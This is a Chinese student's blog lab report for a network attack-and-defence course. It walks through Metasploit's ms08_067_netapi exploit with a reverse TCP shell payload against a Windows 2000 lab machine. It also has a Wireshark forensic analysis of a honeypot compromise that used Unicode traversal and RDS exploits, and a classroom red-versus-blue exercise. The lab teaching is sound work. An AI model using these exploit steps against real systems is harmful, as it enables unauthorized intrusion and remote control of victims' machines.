20232917白胤廷 2023-2024-2 《网络攻防实践》实践六报告

最新推荐文章于 2024-07-17 15:00:16 发布
最新推荐文章于 2024-07-17 15:00:16 发布
阅读量825 收藏 14
点赞数 13
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51457231/article/details/137936662
版权

20232917白胤廷 2023-2024-2 《网络攻防实践》实践六报告

1.实践内容

(1)动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用攻击机kali对靶机Win2k进行渗透攻击

(2)取证分析实践:解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
(3)团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

2.实践过程

在kali打开metasploit,输入命令msfconsole,回车后就会进入到控制台界面
在这里插入图片描述
输入命令search ms08_067查看漏洞ms08_067详细信息:
在这里插入图片描述
输入命令exploit/windows/smb/ms08_067_netapi,然后输入命令show payloads显示可攻击载荷:
在这里插入图片描述
输入命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接,然后输入命令set LHOST 192.168.200.2设置渗透攻击的主机是kali,输入set RHOST 192.168.200.131设置渗透攻击的靶机Win2k:
在这里插入图片描述
可用命令show options查看当前参数列表及其默认装置
在这里插入图片描述
输入命令exploit开始渗透攻击,并在攻击成功后输入ipconfig查看靶机信息
在这里插入图片描述

解码一次成功的NT系统破解攻击

打开kali虚拟机中的Wireshark软件,用wireshark打开那个.log文件,使用命令ip.addr == 172.16.1.106 and http过滤数据
在这里插入图片描述
跟踪一个数据包的TCP数据流,找到特殊字符串%C0%AF…由此判断攻击者进行了Unicode攻击以打开boot.ini文件。因此存在Unicode漏洞攻击。
在这里插入图片描述
继续跟踪数据流,发现有shell语句和"ADM!ROX!YOUR!WORLD"!
在这里插入图片描述
百度可知,这是RDS漏洞。将这些shell代码整理出来,并进行分析。
继续跟踪TCP数据流,查看时发现端口6969
在这里插入图片描述
继续跟踪TCP数据流,可以看到删除的ftp文件,猜测攻击者删除之前下载的文件准备溜走
在这里插入图片描述
继续跟踪数据流,发现其是蜜罐攻击
在这里插入图片描述

实验三. 团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

重复实验一的过程
打开kali的metasploit,选择 metasploitable 中的漏洞进行渗透攻击,获得控制权。

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
我们分析wireshark抓包的过程。
在这里插入图片描述
可以看到攻击地址和靶机地址
源端口4444, 目标端口1042
使用wireshark在一旁嗅探,得到攻击过程中的数据包
在这里插入图片描述

3.学习中遇到的问题及解决

  • 问题1:无法成功攻击对方靶机
  • 问题1解决方案:重新检测联通性,重置IP,再次攻击。

4.实践总结

通过这次实验,我学到了非常有用的渗透框架metasploit,这个框架集成了许多漏洞攻击模块,通过学习使用这个框架,我了解到了很多漏洞,以及攻击漏洞的原理和方法,并且在进行实践三的时候,通过和同学之间的互相攻击,让我更加明确了攻击的原理,受益匪浅。

20232917白胤廷
关注
  • 13
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
华中科技大学网络攻防实践相关
02-14
华中科技大学网络攻防实践相关
案例2-2022年xx网络安全攻防演习防守方总结报告.pdf
08-26
网络安全攻防演习防守方总结报告
20232917白胤廷 2022-2023-2 《网络攻防实践实践报告
weixin_51457231的博客
04-11 533
本次实践主要运用了iptables进行防火墙配置、snort工具进行入侵检测以及通过分析脚本文件大致明白了蜜网网关是如何利用防火墙和入侵检测技术完成其攻击数据捕获和控制需求的。相对来说本次实践难度适中,实践过程中发现对命令的各个参数的使用还是容易混淆,还需要多加实践才能更好的掌握。
20232917白胤廷 2023-2024-2 《网络攻防实践实践十一报告
weixin_51457231的博客
05-30 827
在本次实验中主要进行了三个部分,首先进行了较为简单的渗透攻击,然后分析了一个网页木马攻击场景的具体流程,最后再实际实践模拟了一下攻防双方,实现了一下攻防。本次实验难度不是很大,但是工作量不小,也没太接触过实验二的这种分析,对网页源代码也不够熟悉,不能比较快的找到问题所在。总之这次的实验相当贴近事迹,但是可能使用的漏洞相对比较古老,对目前的机器可能早就失效了,但是原理差距没有那么大,有很强的借鉴意义!
20232917白胤廷 2023-2024-2 《网络攻防实践实践报告
weixin_51457231的博客
05-16 773
本次实践内容主要集中在对SQL注入攻击以及XSS攻击的实施与防御方面;通过本次实践,我对SQL注入攻击、XSS攻击都有了一个初步的了解,对XSS蠕虫的编写也有了一个初步的认识;初步学习web网络攻防,使我对网络攻击与防御技术有了一个更加深入的了解。
20232917白胤廷 2023-2024-2 《网络攻防实践实践报告
weixin_51457231的博客
05-09 880
在进行“注入一个自己制作的shellcode并运行这段shellcode”这项实验时,我因为弄不清楚原理照着实验指导照猫画虎导致了多次失败,幸亏在实践中搞明白了一开始的那一段攻击代码是中的起始的1234是存放覆盖ret地址的位置,在让我明白了第一次构造是尝试,第二次才是动真格的。总之,此次实验不仅让我感受到Linux基本功还不够扎实,更表现了我动手能力的不足,希望在今后我能够收获知识与实践能力。
20232917白胤廷 2022-2023-2 《网络攻防实践实践7报告
weixin_51457231的博客
05-03 53
通过这次学习,使我熟悉了如何在linux系统中使用渗透攻击,通过利用CVE-2007-2447漏洞进行远程渗透攻击,深刻理解了网络攻防的一般步骤,同时还要多加强理论知识的学习,并投入大量时间去实践,才能把网络攻防技术掌握的更好。
20232917白胤廷 2023-2024-2 《网络攻防实践实践报告
weixin_51457231的博客
04-01 533
本次实践主要模拟进行了ARP缓存欺骗攻击、ICMP重定向攻击、SYN Flood 攻击、SYN RST 攻击、TCP会话劫持攻击。通过进行以上实践,我深刻地理解到了它们的攻击过程,明白了网络安全的重要性。同时自己也需要多努力多总结,进一步加深对网络攻防知识的了解与应用。
20232917白胤廷 2023-2024-2 《网络攻防实践》第2次作业
weixin_51457231的博客
03-19 408
1、网络踩点对目标进行信息收集,了解目标的信息安全状况,掌握目标的个人信息。在掌握信息后进行有效的入侵主要分为以下三种:Web搜索与挖掘DNS和IP查询网络拓扑侦察2、网络扫描与探测主机扫描目前广泛使用的主机扫描软件为nmap,主要目的是找出网段内活跃的主机,有ICMP扫描、TCP扫描、UDP扫描,可以利用nsort进行防范端口扫描该技术在使用主机扫描确定主机后,利用端口扫描探测该活跃主机的相关TCP\UDP端口情况,TCP端口扫描又有Connect扫描和SYN扫描。
20232917白胤廷 2022-2023-2 《网络攻防实践》实验三
weixin_51457231的博客
03-25 702
网络嗅探(1)定义网络嗅探是一种黑客常用的窃听技术,利用计算机的网络接口截获目的地为其他计算机的数据报文,以监听数据流中所包含的用户账户密码或私密信息等。(2)网络嗅探器实现网络嗅探技术的工具称为网络嗅探器。嗅探器捕获的数据报文是经过封包处理之后的二进制数据,因此通常会结合网络协议分析技术来解析嗅探到的网络数据,这样才能恢复出TCP/IP协议栈上各层网络协议的内容,以及事件发送的应用层信息。(3)网络嗅探器的原理和实现。
网络攻防实践_课程报告.zip
07-19
网络攻防实践_课程报告.zip
计算机网络攻防-(共37张PPT).pptx
11-14
计算机网络攻防-(共37张PPT).pptx
网络攻防技术实践-防火墙.doc
05-12
网络安全实验
SpringBoot整合SSE,实现后端主动推送DEMO
zjy660358的专栏
07-17 346
说起服务端主动推送,大家第一个想到的一定是WEBSOCKET。作为软件工程师,不能无脑使用一种技术,要结合实际情况,择优选取。SSE(Server-Sent Events)相比于WEBSOCKET1、轻量化、兼容性 基于传统的HTTP协议,所以浏览器兼容性比较好2、 只支持单向通讯。(服务器->客户端)
27_MobileNetV3网络详解
https://github.com/foxpup11?tab=repositories
07-17 812
https://www.bilibili.com/video/BV1GK4y1p7uE/?spm_id_from=333.999.0.0&vd_source=7dace3632125a1ef7fd32c285eb2fbac
RTI DDS大数据碎片
qq_33089547的博客
07-17 979
PublicationBuiltingTopicData或SubscriptionBuiltnTopicData样本较大的最常见原因是序列化的TypeCode或TypeObject,但您也可能发送了大量属性(通过7.5.19 PROPERTY QosPolicy(DDS扩展))或具有较大的ContentFilteredTopic筛选器表达式,以及其他大小可变的字段,这可能会导致样本大小较大。如果您尝试发送一个大小大于MTU的DDS样本,但尚未设置DDS级碎片,您将看到IP级碎片。
Internet 控制报文协议 —— ICMPv4 和 ICMPv6 详解
u013669912的博客
07-17 886
计算机网络技术期末复习
最新发布
CWPIN21的博客
07-17 1093
本文深入探讨了计算机网络的核心概念与关键技术。涵盖了网络拓扑结构,如星型、总线型和环形等,分析了它们的特点与适用场景。详细阐述了 TCP/IP 协议栈的工作原理,包括 IP 地址分配、子网掩码的作用以及路由选择算法。还探讨了网络安全方面的常见威胁,如病毒、黑客攻击等,并介绍了相应的防护措施。通过实例,让读者对计算机网络有更全面、深入的理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值